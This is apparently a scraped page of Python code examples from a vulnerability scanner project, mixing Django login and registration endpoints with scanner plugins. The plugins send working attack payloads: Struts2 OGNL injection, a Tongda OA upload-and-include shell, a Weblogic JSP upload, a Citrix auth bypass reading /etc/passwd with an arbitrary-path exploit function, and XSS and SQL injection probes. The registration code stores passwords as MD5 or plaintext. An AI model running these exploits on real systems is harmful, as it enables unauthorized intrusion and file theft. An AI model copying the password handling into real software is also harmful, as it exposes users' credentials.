Exemple #1
0
def CreateMarkdownProject(request):#用来创建markdown项目,目前只支持单用户,先用于测试
    RequestLogRecord(request, request_api="create_markdown_project")
    if request.method == "POST":
        try:
            UserToken = json.loads(request.body)["token"]
            MarkdownProjectName = json.loads(request.body)["markdown_project_name"]#传入项目名称
            Uid = UserInfo().QueryUidWithToken(UserToken)  # 如果登录成功后就来查询用户名
            if Uid != None:  # 查到了UID
                UserOperationLogRecord(request, request_api="create_markdown_project", uid=Uid)
                while True:  # 用来生成markdown文件名,防止重复
                    MarkdownName=randoms().result(250)#markdown文件名,随机生成
                    CheckName=MarkdownRelationship().CheckConflict(markdown_name=MarkdownName)
                    if not CheckName:  # 如果不冲突的话跳出循环
                        break
                while True: # 用来生成邀请码,防止重复
                    MarkdownProjectInvitationCode=randoms().result(50)#邀请码
                    CheckInvitationCode=MarkdownRelationship().CheckInvitationCode(MarkdownProjectInvitationCode=MarkdownProjectInvitationCode)
                    if not CheckInvitationCode:  # 如果不冲突的话跳出循环
                        break
                MarkdownRelationship().Write(markdown_name=MarkdownName,uid=Uid,markdown_project_name=MarkdownProjectName,markdown_project_owner="1",markdown_project_invitation_code=MarkdownProjectInvitationCode)
                return JsonResponse({'message': "创建成功啦~玛卡玛卡~", 'code': 200, })
            else:
                return JsonResponse({'message': "小宝贝这是非法操作哦(๑•̀ㅂ•́)و✧", 'code': 403, })
        except Exception as e:
            ErrorLog().Write("Web_CollaborationPlatform_Markdown_CreateMarkdownProject(def)", e)
            return JsonResponse({'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, })
    else:
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
Exemple #2
0
def GenerateVerificationCode(request):  #生成验证码函数
    RequestLogRecord(request, request_api="get_verification_code")
    if request.method == "GET":
        try:
            RandomVerificationCode = randoms().LowercaseAndNumbers(
                6)  #获取小写的字符串
            RandomVerificationCodeKey = randoms().result(250)  #生成验证码相关联的key
            PictureBitstream = ImageCaptcha().generate(
                RandomVerificationCode).read()  #获取图片比特流
            VerificationCode().Write(
                code=RandomVerificationCode,
                verification_code_key=RandomVerificationCodeKey)  #把值写入到数据库中
            Result = HttpResponse(PictureBitstream)  #把图片比特流复制给返回包
            Result[
                'VerificationCodeKey'] = RandomVerificationCodeKey  #把值传到返回包的头中
            Result[
                'Access-Control-Expose-Headers'] = "VerificationCodeKey"  #添加头内容保证前端能够获取到值
            return Result
        except Exception as e:
            ErrorLog().Write(
                "Web_BasicFunctions_VerificationCode_GenerateVerificationCode(def)",
                e)
            return JsonResponse({
                'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)',
                'code': 169,
            })
    else:
        return JsonResponse({
            'message': '请使用GET请求',
            'code': 500,
        })
Exemple #3
0
def medusa(**kwargs) -> None:

    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    RM = randoms().result(10)
    RN = randoms().Numbers(5)
    try:

        payload_url = UniformResourceLocatorParameterSubstitution().Result(
            url=url,
            vals="%25%7b+%27" + RM + "%27+%2b+(" + RN + "+%2b+" + RN +
            ").toString()%7d")[0]
        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text

        if resp.status_code == 200 and con.find(RM + str(int(RN) * 2)) != -1:
            Medusa = "存在Struts2远程代码执行漏洞(S2-059)\r\n漏洞详情:\r\n版本号:S2-059\r\n使用EXP:{}\r\n返回数据:{}\r\n".format(
                payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,
                                 **kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),
                               str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  #调用写入类
def create_session(session, url, proxies, RandomAgent):
    params = {
        'type': 'allprofiles',
        'sid': 'loginchallengeresponse1requestbody',
        'username': '******',
        'set': '1'
    }
    headers = {
        'User-Agent': RandomAgent,
        'Accept':
        'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        "Accept-Language":
        "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
        "Content-Type": "application/xml",
        "X-NITRO-USER": randoms().result(8),
        "X-NITRO-PASS": randoms().result(8),
    }

    data = '<appfwprofile><login></login></appfwprofile>'
    session.post(url=url + "/pcidss/report",
                 params=params,
                 headers=headers,
                 timeout=6,
                 data=data,
                 verify=False,
                 proxies=proxies)
    return session
def medusa(**kwargs) -> None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    try:
        upload_url = url + '/ispirit/im/upload.php'
        rm = randoms().result(50)
        rm_file = randoms().result(10)
        Headers1 = Headers

        Headers1[
            "Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        Headers1["X-Forwarded-For"] = "127.0.0.1"
        Headers1["Connection"] = "close"
        Headers1["Upgrade-Insecure-Requests"] = "1"
        Headers1[
            "Content-Type"] = "multipart/form-data; boundary=---------------------------27723940316706158781839860668"

        file_data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"%s.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\necho \"%s\"\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n" % (
            rm_file, rm)
        upload_resp = requests.post(upload_url,
                                    headers=Headers1,
                                    proxies=proxies,
                                    data=file_data)
        name = "".join(re.findall("2003_(.+?)\|", upload_resp.text))
        get_shell_url = url + '/ispirit/interface/gateway.php'
        Headers2 = Headers
        Headers2[
            "Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
        Headers2["X-Forwarded-For"] = "127.0.0.1"
        Headers2["Connection"] = "close"
        Headers2["Upgrade-Insecure-Requests"] = "1"
        Headers2["Content-Type"] = "application/x-www-form-urlencoded"
        data = {
            "json":
            "{\"url\":\"../../../general/../attach/im/2003/%s.%s.jpg\"}" %
            (name, rm_file)
        }
        get_shell_resp = requests.post(get_shell_url,
                                       headers=Headers2,
                                       proxies=proxies,
                                       data=data)
        con = get_shell_resp.text
        code = get_shell_resp.status_code
        if code == 200 and con.find(rm) != -1:
            Medusa = "{}存在通达OA任意文件上传&远程命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\nPOST数据包:{}\r\n上传文件内容:{}\r\n返回随机数:{}\r\n如需执行命令请在脚本中修改函数".format(
                url, get_shell_url, data, file_data, con)
            #如果需要使用命令执行把下面这行注释打开即可
            #command(scheme + "://" + url + ":" + str(port))
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, get_shell_resp,
                                 **kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),
                               str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  #调用写入类
Exemple #6
0
def Registered(request):
    RequestLogRecord(request, request_api="registered")
    if request.method == "POST":
        try:
            ShowName = json.loads(request.body).get("show_name")
            Username=json.loads(request.body).get("username")
            Passwd=json.loads(request.body).get("passwd")
            Email=json.loads(request.body).get("email")
            Key = json.loads(request.body).get("key")
            VerificationCodeKey = json.loads(request.body)["verification_code_key"]#获取验证码关联的KEY
            Code = json.loads(request.body)["verification_code"].lower()#获取验证码

            if VerificationCodeKey!=None and Code!=None:#判断传入数据不为空
                VerificationCodeResult=VerificationCode().Query(code=Code,verification_code_key=VerificationCodeKey)#获取判断
                if VerificationCodeResult:#如果为真,进行登录验证
                    if registration_function_status:#判断是否开启注册功能
                        if len(ShowName.strip("\r\n"))==0 or len(Username.strip("\r\n"))==0 or len(Passwd.strip("\r\n"))==0 or len(Email.strip("\r\n"))==0 or len(Key.strip("\r\n"))==0:#验证数据不为空
                            return JsonResponse({'message': '宝贝数据呢?💚', 'code': 666, })
                        else:
                            if Key==secret_key_required_for_account_registration:#判断是否符合注册值
                                VerifyUsername=UserInfo().VerifyUsername(Username)
                                VerifyEmail=UserInfo().VerifyEmail(Email)
                                if VerifyUsername or VerifyEmail:
                                    return JsonResponse({'message': '用户名或邮箱已存在', 'code': 604, })

                                elif (VerifyUsername is None)or(VerifyEmail is None):

                                    return JsonResponse({'message': '报错了🙄', 'code': 404, })
                                elif not VerifyUsername or not VerifyEmail:
                                    Token=randoms().result(250)
                                    Uid = randoms().result(100)#生成随机数,用户UID
                                    Key = randoms().result(40) #生成key值
                                    DomainNameSystemLogKey = randoms().LowercaseAndNumbers(5)  # 生成DNSLOGkey值
                                    Md5Passwd=Md5Encryption().Md5Result(Passwd)#进行加密
                                    UserWrite=UserInfo().Write(name=Username, show_name=ShowName, token=Token, passwd=Md5Passwd,
                                                     email=Email, uid=Uid,key=Key,avatar="admin.jpg")
                                    DomainNameSystemLogKeyword().Write(uid=Uid,key=DomainNameSystemLogKey)
                                    if UserWrite:
                                        return JsonResponse({'message': '注册成功', 'code': 200, })
                                    elif UserWrite is None:
                                        return JsonResponse({'message': '未知错误', 'code': 400, })
                                    else:
                                        return JsonResponse({'message': '注册失败', 'code': 603, })
                            else:
                                return JsonResponse({'message': '小宝贝这是非法注册哦(๑•̀ㅂ•́)و✧', 'code': 403, })
                    else:
                        return JsonResponse({'message': '小宝贝你没有开启注册功能哦!!', 'code': 503, })
                else:
                    return JsonResponse({'message': "验证码错误或者过期!", 'code': 504, })
            else:
                return JsonResponse({'message': "验证码或者验证码秘钥不能为空!", 'code': 505, })
        except Exception as e:
            ErrorLog().Write("Web_BasicFunctions_Registered_Registered(def)", e)
            return JsonResponse({'message': '自己去看报错日志!', 'code': 169, })

    else:
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:

        payload_url = scheme + "://" + url + ":" + str(port)
        session = requests.Session()
        create_session(session, payload_url, proxies, RandomAgent)
        value = get_rand(session, payload_url, proxies, RandomAgent)
        create_session(session, payload_url, proxies, RandomAgent)  #再次创建连接
        payload = '%2fetc%2fpasswd'
        read_file_payload = payload_url + "/rapi/filedownload?filter=path:" + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            'Content-Type': 'application/xml',
            'X-NITRO-USER': randoms().result(8),
            'X-NITRO-PASS': randoms().result(8),
            'rand_key': value
        }
        data = '<clipermission></clipermission>'
        resp = session.post(url=read_file_payload,
                            headers=headers,
                            timeout=6,
                            data=data,
                            verify=False,
                            proxies=proxies)
        response_str = json.dumps(resp.headers.__dict__['_store'])
        code = resp.status_code
        con = resp.text
        if code == 406 and "Content-Disposition" in response_str and con.find(
                "root:") != -1:
            Medusa = "{} 存在Citrix认证绕过漏洞(CVE-2020-8193)\r\n验证数据:\r\n漏洞位置:{}\r\n读取文件:{}\r\n返回数据包:{}\r\n".format(
                url, payload_url, payload, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,
                                 **kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),
                               str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  #调用写入类
def medusa(**kwargs)->None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    try:
        payload = '/ws_utc/resources/setting/keystore?timestamp=139114985403'
        payload_url =url + payload
        RM1=randoms().result(10)
        RM2 = randoms().result(100)
        data='''------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_name"

1
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_edit_mode"

false
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_password_front"

1
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_password"

1
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_password_changed"

true
------WebKitFormBoundaryzVtngnKbQt01czaO
Content-Disposition: form-data; name="ks_filename"; filename="{}.jsp"
Content-Type: application/octet-stream


{}
------WebKitFormBoundaryzVtngnKbQt01czaO--
'''.format(RM1,RM2)

        Headers["Content-Type"]="multipart/form-data; boundary=----WebKitFormBoundaryzVtngnKbQt01czaO"

        resp = requests.post(payload_url,headers=Headers,data=data, proxies=proxies, timeout=6, verify=False)
        con = resp.text
        code=resp.status_code
        if code==200 and con.find(RM1+".jsp")!=-1 and con.find(RM2)!=-1:
            Medusa = "{}存在Weblogic任意文件上传漏洞(CVE-2018-2894)\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n上传文件名:{}\r\n上传文件内容:{}\r\n".format(url, payload_url, con,RM1+".jsp",RM2)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)  # 调用写入类传入URL和错误插件名
def exploit(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port

    command = kwargs.get("Command").replace("/", "%2f")
    try:
        payload_url = scheme + "://" + url + ":" + str(port)
        session = requests.Session()
        create_session(session, payload_url, proxies, RandomAgent)
        value = get_rand(session, payload_url, proxies, RandomAgent)
        create_session(session, payload_url, proxies, RandomAgent)  # 再次创建连接
        payload = command
        read_file_payload = payload_url + "/rapi/filedownload?filter=path:" + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept':
            'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
            "Accept-Language":
            "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            'Content-Type': 'application/xml',
            'X-NITRO-USER': randoms().result(8),
            'X-NITRO-PASS': randoms().result(8),
            'rand_key': value
        }
        data = '<clipermission></clipermission>'
        resp = session.post(url=read_file_payload,
                            headers=headers,
                            timeout=6,
                            data=data,
                            verify=False,
                            proxies=proxies)
        con = resp.text
        ExploitOutput().Banner(OutputData=con)  #回显调用函数
        _t = VulnerabilityInfo(con)
        Exploit(_t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
    except Exception as e:
        print(
            "\033[31m[ ! ] Execution error, the error message has been written in the log!\033[0m"
        )
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url +
                         " || Exploit", e)  # 调用写入类传入URL和错误插件名
Exemple #10
0
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        rm=randoms().result(20)
        payload = "/admin.php?p=1%22%3E%3Cscript%3Ealert%28/{}/%29%3C/script%3E".format(rm)
        payload_url = scheme + "://" + url +":"+ str(port) + payload

        resp = requests.get(payload_url,headers=Headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(">alert(/{}/)".format(rm)) != -1 :
            Medusa = "{}存在EcoCMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
Exemple #11
0
def Registered(request):
    if request.method == "POST":
        try:
            ShowName = json.loads(request.body).get("show_name")
            Username = json.loads(request.body).get("username")
            Passwd = json.loads(request.body).get("passwd")
            Email = json.loads(request.body).get("email")
            if len(ShowName.strip(" \r\n")) == 0 or len(
                    Username.strip(" \r\n")) == 0 or len(
                        Passwd.strip(" \r\n")) == 0 or len(
                            Email.strip(" \r\n")) == 0:  #验证数据不为空
                return JsonResponse({
                    'message': '宝贝数据呢?',
                    'code': 666,
                })
            else:
                VerifyUsername = UserInfo().VerifyUsername(Username)
                VerifyEmail = UserInfo().VerifyEmail(Email)
                if VerifyUsername or VerifyEmail:
                    return JsonResponse({
                        'message': '用户名或邮箱已存在',
                        'code': 604,
                    })

                elif (VerifyUsername is None) or (VerifyEmail is None):

                    return JsonResponse({
                        'message': '报错了',
                        'code': 404,
                    })
                elif not VerifyUsername or not VerifyEmail:
                    Token = randoms().result(250)
                    UserWrite = UserInfo().Write(name=Username,
                                                 show_name=ShowName,
                                                 token=Token,
                                                 passwd=Passwd,
                                                 email=Email,
                                                 img_path="img_path")
                    if UserWrite:
                        return JsonResponse({
                            'message': '注册成功',
                            'code': 200,
                        })
                    elif UserWrite is None:
                        return JsonResponse({
                            'message': '未知错误',
                            'code': 400,
                        })
                    else:
                        return JsonResponse({
                            'message': '注册失败',
                            'code': 603,
                        })
        except Exception as e:
            ErrorLog().Write("Web_Api_Registered_Registered(def)", e)
    else:
        return JsonResponse({
            'message': '请使用Get请求',
            'code': 500,
        })
def medusa(Url,RandomAgent,UnixTimestamp):
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        rm=randoms().result(20)
        payload = "/admin.php?p=1%22%3E%3Cscript%3Ealert%28/{}/%29%3C/script%3E".format(rm)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url,headers=headers, timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find(">alert(/{}/)".format(rm)) != -1 :
            Medusa = "{}存在EcoCMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,UnixTimestamp):
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        rm=randoms().result(20)
        payload = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent"
        data = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert({})%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''.format(rm)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.post(payload_url,headers=headers, data=data, timeout=6,  verify=False)
        con = resp.text
        code = resp.status_code
        if code== 200 and con.find("<td><img src=x onerror=alert({})></td>".format(rm)) != -1 :
            Medusa = "{}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,UnixTimestamp).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    try:
        rm = randoms().result(20)
        payload = '/mobile/user.php?act=act_register'
        payload_url = url + payload
        data = 'username=networks<script>alert({})</script>&[email protected]&password=woaini&confirm_password=woaini&act=act_register&back_act='.format(
            rm)

        resp = requests.post(payload_url,
                             data=data,
                             headers=Headers,
                             timeout=6,
                             proxies=proxies,
                             verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find(
                "<script>alert({})</script>".format(rm)) != -1:
            Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,
                                 **kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),
                               str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  #调用写入类
Exemple #15
0
def Login(request):#用户登录,每次登录成功都会刷新一次Token
    RequestLogRecord(request, request_api="login")
    if request.method == "POST":
        try:
            Username=json.loads(request.body)["username"]
            Passwd=json.loads(request.body)["passwd"]
            Md5Passwd=Md5Encryption().Md5Result(Passwd)#对密码加密
            UserLogin=UserInfo().UserLogin(Username,Md5Passwd)
            if UserLogin is None:
                return JsonResponse({'message': '账号或密码错误', 'code': 604, })

            else:
                while True:#如果查询确实冲突了
                    Token = randoms().result(250)
                    QueryTokenValidity = UserInfo().QueryTokenValidity(Token)#用来查询Token是否冲突了
                    if not QueryTokenValidity:#如果不冲突的话跳出循环
                        break
                UpdateToken=UserInfo().UpdateToken(name=Username, token=Token)#接着更新Token
                if UpdateToken:#如果更新成功了
                    Uid = UserInfo().QueryUidWithToken(Token)  # 查询UID
                    UserOperationLogRecord(request, request_api="login", uid=Uid)
                    return JsonResponse({'message': Token, 'code': 200, })
        except Exception as e:
            ErrorLog().Write("Web_Api_User_LogIn(def)", e)
    else:
        return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        RD=randoms().result(20)
        payload = "/plus/ajax_street.php?act=key&key={}%%27%20and%20c_name%20like%20%27%%E5%BB%BA%E8%AE%BE".format(RD)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }

        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        if code==200 and con.find("{}".format(RD)) != -1 :
            Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url, **kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url), str(Medusa))  # 写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
    url = kwargs.get("Url")  # 获取传入的url参数
    Headers = kwargs.get("Headers")  # 获取传入的头文件
    proxies = kwargs.get("Proxies")  # 获取传入的代理参数
    try:
        rm = randoms().result(10)
        payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27{}%27%29%3C/script%3E'.format(
            rm)
        payload_url = url + payload

        resp = requests.get(payload_url,
                            headers=Headers,
                            timeout=6,
                            proxies=proxies,
                            verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('<script>alert("' + rm +
                                    '")</script>') != -1:
            Medusa = "{}存在CMSimple跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
                url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, resp,
                                 **kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),
                               str(Medusa))  #写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                              e)  #调用写入类
def medusa(Url,RandomAgent,Token,proxies=None):
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        rm = randoms().result(20)
        payload = "/affiche.php?from=a.baidu.com%3Cscript%3Ealert({})%3C/script%3E&ad_id=-1".format(rm)
        payload_url = scheme + "://" + url +":"+ str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.get(payload_url,headers=headers,timeout=6, proxies=proxies, verify=False)
        con = resp.text
        code = resp.status_code
        if con.find("<script>alert({})</script>".format(rm))!= -1:
            Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,Token).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write(url, _)  # 调用写入类传入URL和错误插件名
def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        rm=randoms().result(20)
        payload = "/main/calendar/agenda_list.php?type=personal%27%3E%3Cscript%3Econfirm%28{}%29%3C%2fscript%3E%3C%21--".format(rm)
        payload_url = scheme + "://" + url + ":" + str(port) + payload

        resp = requests.get(payload_url, headers=Headers, timeout=6,proxies=proxies, verify=False)
        con = resp.text
        if con.find("<script>confirm({})</script>".format(rm)) != -1:
            Medusa = "{}存在ChamiloLMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # 传入url和扫描到的数据
            WriteFile().result(str(url), str(Medusa))  # 写入文件,url为目标文件名统一传入,Medusa为结果
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
Exemple #20
0
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    proxies=Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port
    try:
        rm=randoms().result(10)
        payload = '/whizzywig/wb.php?d=%27%3E%3Cscript%3Ealert%28%27{}%27%29%3C/script%3E'.format(rm)
